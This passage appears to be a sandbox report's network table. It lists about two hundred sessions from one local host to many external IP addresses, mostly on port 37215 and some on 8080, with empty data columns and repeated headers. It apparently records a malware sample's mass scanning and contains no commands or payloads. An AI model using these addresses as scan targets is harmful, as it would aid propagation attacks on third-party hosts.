                                                        18669192.168.2.2334240197.182.50.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18670192.168.2.2349184197.210.52.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18671192.168.2.2336096157.195.69.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18672192.168.2.2343600197.83.127.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18673192.168.2.2342070186.156.210.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18674192.168.2.235206641.18.132.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18675192.168.2.2339428172.181.39.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18676192.168.2.234909441.175.142.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18677192.168.2.233460241.127.118.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18678192.168.2.234913241.142.84.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18679192.168.2.2335714157.229.57.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18680192.168.2.2335924197.201.99.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18681192.168.2.235298441.193.245.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18682192.168.2.233545241.227.45.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18683192.168.2.2353692197.42.90.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18684192.168.2.235209241.93.203.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18685192.168.2.235595241.65.167.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18686192.168.2.2337632116.133.175.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18687192.168.2.2336720204.60.223.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18688192.168.2.233628041.41.177.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18689192.168.2.2337602197.9.122.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18690192.168.2.234853441.75.126.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18691192.168.2.2336572197.122.142.17837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18692192.168.2.2350444155.96.8.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18693192.168.2.2338042155.37.142.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18694192.168.2.2350298197.158.197.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18695192.168.2.235896024.122.163.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18696192.168.2.236084041.37.239.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18697192.168.2.2357888157.20.80.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18698192.168.2.2351040157.94.33.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18699192.168.2.234404641.245.38.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18700192.168.2.235131641.32.191.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18701192.168.2.233659441.114.176.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18702192.168.2.234691641.216.122.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18703192.168.2.2337354157.140.117.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18704192.168.2.235483449.152.222.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18705192.168.2.2340864222.174.115.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18706192.168.2.234492041.139.7.16237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18707192.168.2.2338674197.53.248.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18708192.168.2.2343990197.129.181.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18709192.168.2.2344856157.54.194.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18710192.168.2.2357138157.92.1.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18711192.168.2.2344568157.21.92.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18712192.168.2.233318641.85.186.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18713192.168.2.234592841.1.87.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18714192.168.2.23517421.49.80.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18715192.168.2.235398058.21.17.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18716192.168.2.234886041.248.15.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18717192.168.2.2342250197.79.226.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18718192.168.2.2338604197.94.166.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18719192.168.2.2333762157.22.26.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18720192.168.2.2352252220.109.92.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18721192.168.2.233743641.57.219.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18722192.168.2.2342232168.112.136.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18723192.168.2.2338946197.229.203.13837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18724192.168.2.2353656197.110.50.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18725192.168.2.234240641.27.250.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18726192.168.2.2338370157.212.191.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18727192.168.2.2360390157.102.138.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18728192.168.2.235713841.79.37.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18729192.168.2.2347422197.128.130.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18730192.168.2.2357616197.48.237.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18731192.168.2.2339254197.163.69.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18732192.168.2.2342626193.72.1.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18733192.168.2.2335058197.98.210.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18734192.168.2.2355464157.16.254.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18735192.168.2.234087041.191.178.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18736192.168.2.2356456197.137.14.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18737192.168.2.2337066157.92.229.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18738192.168.2.2337606197.22.86.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18739192.168.2.2343790157.118.13.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18740192.168.2.2341396157.90.50.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18741192.168.2.235829478.36.122.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18742192.168.2.2350176197.36.65.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18743192.168.2.2342696197.144.219.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18744192.168.2.2353714157.195.22.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18745192.168.2.235744424.143.236.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18746192.168.2.234993041.249.30.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18747192.168.2.235179441.194.21.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18748192.168.2.2333558157.247.102.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18749192.168.2.2339882157.107.87.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18750192.168.2.234113041.109.86.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18751192.168.2.235755891.231.37.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18752192.168.2.2337502157.113.163.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18753192.168.2.2348094123.17.185.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18754192.168.2.2360254113.72.212.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18755192.168.2.2344088103.116.170.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18756192.168.2.235178223.167.112.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18757192.168.2.2357828197.201.140.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18758192.168.2.2358196157.17.162.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18759192.168.2.2353752157.177.127.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18760192.168.2.234299475.23.7.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18761192.168.2.2341880197.105.39.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18762192.168.2.234223441.240.67.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18763192.168.2.2342470213.63.115.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18764192.168.2.233800468.103.16.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18765192.168.2.2359110182.171.143.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18766192.168.2.2352762221.14.13.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18767192.168.2.2343740197.103.142.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18768192.168.2.2332956157.168.201.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18769192.168.2.2340122137.167.196.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18770192.168.2.236033241.185.186.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18771192.168.2.234770041.140.240.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18772192.168.2.2335744197.194.7.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18773192.168.2.234768039.116.138.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18774192.168.2.233716651.188.56.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18775192.168.2.235884241.228.142.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18776192.168.2.234192441.45.144.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18777192.168.2.2343994157.55.251.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18778192.168.2.2336844197.39.8.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18779192.168.2.2343656186.59.210.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18780192.168.2.233890441.239.220.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18781192.168.2.233414441.175.57.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18782192.168.2.2353614197.58.95.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18783192.168.2.2346344157.189.106.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18784192.168.2.235040441.32.15.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18785192.168.2.233346041.96.72.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18786192.168.2.2337390217.47.187.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18787192.168.2.2339662157.15.203.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18788192.168.2.2350334157.92.14.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18789192.168.2.234518641.165.227.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18790192.168.2.2337300197.49.16.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18791192.168.2.2338258157.84.16.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18792192.168.2.2354496157.86.43.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18793192.168.2.233766041.160.162.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18794192.168.2.234016065.192.76.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18795192.168.2.2345864197.160.115.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18796192.168.2.2354458197.133.183.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18797192.168.2.233752641.153.34.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18798192.168.2.234877241.252.19.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18799192.168.2.2355392197.57.150.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18800192.168.2.2359152220.50.3.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18801192.168.2.2357322157.245.67.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18802192.168.2.2351834113.146.242.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18803192.168.2.2336350197.231.138.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18804192.168.2.2343446197.2.234.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18805192.168.2.2351882157.140.124.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18806192.168.2.233665841.187.27.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18807192.168.2.23556345.140.127.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18808192.168.2.234899434.207.33.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18809192.168.2.2333588157.43.155.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18810192.168.2.235399441.7.202.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18811192.168.2.2346014100.171.91.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18812192.168.2.234997641.210.205.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18813192.168.2.2345472197.142.232.18937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18814192.168.2.233498041.37.225.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18815192.168.2.2347448197.158.98.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18816192.168.2.2348334157.2.73.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18817192.168.2.2348406157.92.202.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18818192.168.2.2352798197.110.251.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18819192.168.2.2344974197.63.21.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18820192.168.2.234405027.230.154.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18821192.168.2.235094441.182.101.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18822192.168.2.2355398157.26.241.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18823192.168.2.2346220157.188.189.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18824192.168.2.2334342157.25.174.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18825192.168.2.235145841.122.165.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18826192.168.2.2347998157.250.229.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18827192.168.2.2338614197.207.78.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18828192.168.2.233347046.115.204.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18829192.168.2.233336241.219.56.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18830192.168.2.2337246157.208.223.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18831192.168.2.2358570109.207.110.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18832192.168.2.2339094149.172.205.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18833192.168.2.233501443.183.21.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18834192.168.2.2359058182.187.217.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18835192.168.2.2357180179.209.22.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18836192.168.2.2359772135.31.171.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18837192.168.2.235256852.241.226.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18838192.168.2.2353860152.208.27.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18839192.168.2.235166678.70.182.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18840192.168.2.2339510222.154.39.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18841192.168.2.235685257.66.11.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18842192.168.2.235015035.154.37.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18843192.168.2.2357726115.85.210.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18844192.168.2.233560613.50.81.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18845192.168.2.2349390198.254.237.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18846192.168.2.233476866.229.22.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18847192.168.2.236051642.240.166.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18848192.168.2.2335920177.250.141.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18849192.168.2.2334322149.178.120.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18850192.168.2.234726627.154.250.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18851192.168.2.23377229.15.2.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18852192.168.2.234193067.12.178.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18853192.168.2.233567450.103.71.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18854192.168.2.2341854176.85.196.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18855192.168.2.2348636160.127.149.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18856192.168.2.234459452.155.192.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18857192.168.2.234367492.97.106.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18858192.168.2.2349908202.156.231.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18859192.168.2.233996651.42.103.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18860192.168.2.2354028196.193.71.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18861192.168.2.233616268.84.115.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18862192.168.2.2332944179.144.254.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18863192.168.2.2345020106.248.236.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18864192.168.2.2347572174.164.121.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18865192.168.2.2353510130.174.100.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18866192.168.2.2346214109.7.208.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18867192.168.2.2335276122.29.230.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18868192.168.2.2339806103.38.154.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18869192.168.2.2359316150.65.109.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18870192.168.2.2355838105.54.223.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18871192.168.2.235708050.70.172.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18872192.168.2.2338722104.156.166.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18873192.168.2.2339236210.186.29.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18874192.168.2.2345966171.133.224.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18875192.168.2.2344636221.92.85.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18876192.168.2.2342080149.95.61.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18877192.168.2.2358898144.247.106.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18878192.168.2.2354524129.184.101.2518080
                                                        TimestampBytes transferredDirectionData


